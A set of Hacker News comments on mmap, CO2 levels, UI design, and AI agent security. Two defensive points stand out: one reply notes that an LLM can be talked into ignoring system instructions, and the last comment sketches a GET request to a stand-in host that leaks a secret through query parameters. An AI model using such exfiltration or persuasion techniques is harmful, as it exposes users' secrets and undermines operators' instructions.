More

zahlman · 2026-03-01T23:24:57 1772407497

Couldn't you just insert tokens that don't correspond to any possible input, after the tokenization is performed? Unicode is bounded, but token IDs not so much.

krackers · 2026-03-02T00:01:27 1772409687

This already happens, user vs system prompts are delimited in this manner, and most good frontends will treat any user input as "needing to be escaped" so you can never "prompt inject" your way into emitting a system role token.

The issue is that you don't need to physically emit a "system role" token in order to convince the LLM that it's worth ignoring the system instructions.

zahlman · 2026-03-01T22:00:59 1772402459

Aside from what https://news.ycombinator.com/item?id=47210893 said, mmap() is a low-level design that makes it easier to work with files that don't fit in memory and fundamentally represent a single homogeneous array of some structure. But it turns out that files commonly do fit in memory (nowadays you commonly have on the order of ~100x as much disk as memory, but millions of files); and you very often want to read them in order, because that's the easiest way to make sense of them (and tape is not at all the only storage medium historically that had a much easier time with linear access than random access); and you need to parse them because they don't represent any such array.

When I was first taught C formally, they definitely walked us through all the standard FILE* manipulators and didn't mention mmap() at all. And when I first heard about mmap() I couldn't imagine personally having a reason to use it.

nickelpro · 2026-03-01T22:06:56 1772402816

mmap is also relatively slow (compared to modern solutions, io_uring and friends), and immensely painful for error handling.

It's simple, I'll give it that.

nixon_why69 · 2026-03-02T03:35:50 1772422550

Page faults are slower than being deliberate about your I/O but mapped memory is no faster or slower than "normal" memory, its the same mechanism.

zahlman · 2026-03-01T11:48:42 1772365722

> These claims deserve scrutiny, not because they are entirely wrong, but because they echo promises made in 1959, in 1973, in 1985, and in 2015.

Seems like that little kerfuffle with all the 2-digit years in legacy COBOL code was a well-timed distraction.

zahlman · 2026-03-01T01:17:33 1772327853

Indeed.

> However, since the advent of widespread industrialisation, atmospheric CO2 levels have exponentially increased (Fig. 1). In just the last ~ 50 years it has risen from < 340 ppm (in 1980), to > 420 ppm in 2025 (Lan et al., 2025). Atmospheric CO2 is currently increasing at more than 2 ppm each year, largely due to humanity’s activities, such as the burning of fossil fuels (Eggleton, 2012).

There's good reason to believe we're on the cusp of a solar energy revolution and, more generally, ready to turn things around. But even in the worst scenarios I can imagine, outdoor air 50 years from now (as posited in the title) would not be as bad as indoor air now.

zahlman · 2026-03-01T01:04:31 1772327071

Title censorship verbatim from the source.

zahlman · 2026-03-01T00:50:28 1772326228

Separating them is good for avoiding misclicks.

Decades ago, MacOS properly had the close box for windows on the opposite side from minimize etc. widgets; now the one destructive window action could be reasonably safe without confirmation. Then Windows started gaining popularity and nobody ever did it the right way by default again. A pity for the sharp minds at Xerox PARC.

Affric · 2026-03-01T10:09:19 1772359759

Command Q and Command W are still beside each other though

ginko · 2026-03-01T10:18:29 1772360309

I don't mind ok and cancel being on opposite sides. It's mainly ok not being bottom-right that bothers me.

zahlman · 2026-02-28T22:56:56 1772319416

The point is to be able to choose the (presumably small) subset of features you actually want, and have a tractable review problem. Presumably people who really want openclaw would just use openclaw.

zahlman · 2026-02-28T19:16:41 1772306201

> That means agents should not have access to internet without a proxy, which has proper guardrails. Openclaw doesn't have this model unfortunately so I had to build a multi-tenant version of Openclaw with a gateway system to implement these security boundaries.

I wonder how long until we see a startup offering such a proxy as a service.

zahlman · 2026-02-28T19:15:37 1772306137

> harder than you might think. openclaw found my browser cookies. (I ran it on a vm so no serious cookies found, but still)

It's easy, and you did it the right way. Read "don't let your agents see any secret" as "don't put secrets in a filesystem the agents have access to".

zahlman · 2026-02-28T19:11:22 1772305882

GET and POST are merely suggestions to the server. A GET request still has query parameters; even if the server is playing by the book, an agent can still end up requesting GET http://angelic-service.example.com/api/v1/innocuous-thing?pa... and now your `dangerous-secret` is in the server logs.

You can try proxying and whitelisting its requests but the properly paranoid option is sneaker-netting necessary information (say, the documentation for libraries; a local package index) to a separate machine.